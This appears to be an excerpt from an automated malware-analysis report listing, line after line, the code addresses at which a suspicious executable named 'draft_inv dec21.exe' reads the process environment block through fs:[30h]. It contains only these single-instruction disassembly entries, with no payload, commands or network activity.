Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h] 8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h] 8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h] 8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h] 8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABE18 mov ecx, dword ptr fs:[00000030h] 8_2_1E8ABE18
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E8E15 mov eax, dword ptr fs:[00000030h] 8_2_1E8E8E15
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984E03 mov eax, dword ptr fs:[00000030h] 8_2_1E984E03
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3E14 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3E14
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3E14 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3E14
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3E14 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3E14
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E946E30 mov eax, dword ptr fs:[00000030h] 8_2_1E946E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E946E30 mov eax, dword ptr fs:[00000030h] 8_2_1E946E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov ecx, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h] 8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h] 8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h] 8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h] 8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECE3F mov eax, dword ptr fs:[00000030h] 8_2_1E8ECE3F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2E32 mov eax, dword ptr fs:[00000030h] 8_2_1E8B2E32
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h] 8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h] 8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92DE50 mov ecx, dword ptr fs:[00000030h] 8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h] 8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h] 8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DEE48 mov eax, dword ptr fs:[00000030h] 8_2_1E8DEE48
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AFE40 mov eax, dword ptr fs:[00000030h] 8_2_1E8AFE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AAE40 mov eax, dword ptr fs:[00000030h] 8_2_1E8AAE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AAE40 mov eax, dword ptr fs:[00000030h] 8_2_1E8AAE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AAE40 mov eax, dword ptr fs:[00000030h] 8_2_1E8AAE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ADE45 mov eax, dword ptr fs:[00000030h] 8_2_1E8ADE45
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ADE45 mov ecx, dword ptr fs:[00000030h] 8_2_1E8ADE45
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABE60 mov eax, dword ptr fs:[00000030h] 8_2_1E8ABE60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABE60 mov eax, dword ptr fs:[00000030h] 8_2_1E8ABE60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96EE78 mov eax, dword ptr fs:[00000030h] 8_2_1E96EE78
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984E62 mov eax, dword ptr fs:[00000030h] 8_2_1E984E62
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1E70 mov eax, dword ptr fs:[00000030h] 8_2_1E8B1E70
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECE70 mov eax, dword ptr fs:[00000030h] 8_2_1E8ECE70
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E7E71 mov eax, dword ptr fs:[00000030h] 8_2_1E8E7E71
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F8B mov eax, dword ptr fs:[00000030h] 8_2_1E938F8B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F8B mov eax, dword ptr fs:[00000030h] 8_2_1E938F8B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F8B mov eax, dword ptr fs:[00000030h] 8_2_1E938F8B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DBF93 mov eax, dword ptr fs:[00000030h] 8_2_1E8DBF93
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1FAA mov eax, dword ptr fs:[00000030h] 8_2_1E8B1FAA
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E8FBC mov eax, dword ptr fs:[00000030h] 8_2_1E8E8FBC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B4FB6 mov eax, dword ptr fs:[00000030h] 8_2_1E8B4FB6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DCFB0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DCFB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DCFB0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DCFB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96EFD3 mov eax, dword ptr fs:[00000030h] 8_2_1E96EFD3
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABFC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ABFC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov ecx, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A9FD0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A9FD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984FFF mov eax, dword ptr fs:[00000030h] 8_2_1E984FFF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D8FFB mov eax, dword ptr fs:[00000030h] 8_2_1E8D8FFB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBF0C mov eax, dword ptr fs:[00000030h] 8_2_1E8EBF0C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBF0C mov eax, dword ptr fs:[00000030h] 8_2_1E8EBF0C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBF0C mov eax, dword ptr fs:[00000030h] 8_2_1E8EBF0C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984F1D mov eax, dword ptr fs:[00000030h] 8_2_1E984F1D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CCF00 mov eax, dword ptr fs:[00000030h] 8_2_1E8CCF00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CCF00 mov eax, dword ptr fs:[00000030h] 8_2_1E8CCF00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FF03 mov eax, dword ptr fs:[00000030h] 8_2_1E92FF03
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FF03 mov eax, dword ptr fs:[00000030h] 8_2_1E92FF03
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FF03 mov eax, dword ptr fs:[00000030h] 8_2_1E92FF03
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h] 8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h] 8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h] 8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h] 8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F3C mov eax, dword ptr fs:[00000030h] 8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F3C mov eax, dword ptr fs:[00000030h] 8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F3C mov ecx, dword ptr fs:[00000030h] 8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F3C mov ecx, dword ptr fs:[00000030h] 8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AFF30 mov edi, dword ptr fs:[00000030h] 8_2_1E8AFF30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96AF50 mov ecx, dword ptr fs:[00000030h] 8_2_1E96AF50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96BF4D mov eax, dword ptr fs:[00000030h] 8_2_1E96BF4D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E906F70 mov eax, dword ptr fs:[00000030h] 8_2_1E906F70
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984F7C mov eax, dword ptr fs:[00000030h] 8_2_1E984F7C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96EF66 mov eax, dword ptr fs:[00000030h] 8_2_1E96EF66
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AEF79 mov eax, dword ptr fs:[00000030h] 8_2_1E8AEF79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AEF79 mov eax, dword ptr fs:[00000030h] 8_2_1E8AEF79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AEF79 mov eax, dword ptr fs:[00000030h] 8_2_1E8AEF79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABF70 mov eax, dword ptr fs:[00000030h] 8_2_1E8ABF70
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1F70 mov eax, dword ptr fs:[00000030h] 8_2_1E8B1F70
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAF72 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAF72
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96FC95 mov eax, dword ptr fs:[00000030h] 8_2_1E96FC95
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E959C98 mov ecx, dword ptr fs:[00000030h] 8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E959C98 mov eax, dword ptr fs:[00000030h] 8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E959C98 mov eax, dword ptr fs:[00000030h] 8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E959C98 mov eax, dword ptr fs:[00000030h] 8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E933C80 mov ecx, dword ptr fs:[00000030h] 8_2_1E933C80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B7C95 mov eax, dword ptr fs:[00000030h] 8_2_1E8B7C95
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B7C95 mov eax, dword ptr fs:[00000030h] 8_2_1E8B7C95
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h] 8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h] 8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E943CD4 mov ecx, dword ptr fs:[00000030h] 8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h] 8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h] 8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E9CCF mov eax, dword ptr fs:[00000030h] 8_2_1E8E9CCF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BFCC9 mov eax, dword ptr fs:[00000030h] 8_2_1E8BFCC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E935CD0 mov eax, dword ptr fs:[00000030h] 8_2_1E935CD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984CD2 mov eax, dword ptr fs:[00000030h] 8_2_1E984CD2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E6CC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8E6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D8CDF mov eax, dword ptr fs:[00000030h] 8_2_1E8D8CDF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D8CDF mov eax, dword ptr fs:[00000030h] 8_2_1E8D8CDF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECCD1 mov ecx, dword ptr fs:[00000030h] 8_2_1E8ECCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECCD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8ECCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECCD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8ECCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92CCF0 mov ecx, dword ptr fs:[00000030h] 8_2_1E92CCF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7CF1 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7CF1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3CF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3CF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3CF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3CF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E947CE8 mov eax, dword ptr fs:[00000030h] 8_2_1E947CE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E930CEE mov eax, dword ptr fs:[00000030h] 8_2_1E930CEE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DECF3 mov eax, dword ptr fs:[00000030h] 8_2_1E8DECF3
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DECF3 mov eax, dword ptr fs:[00000030h] 8_2_1E8DECF3
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2C10
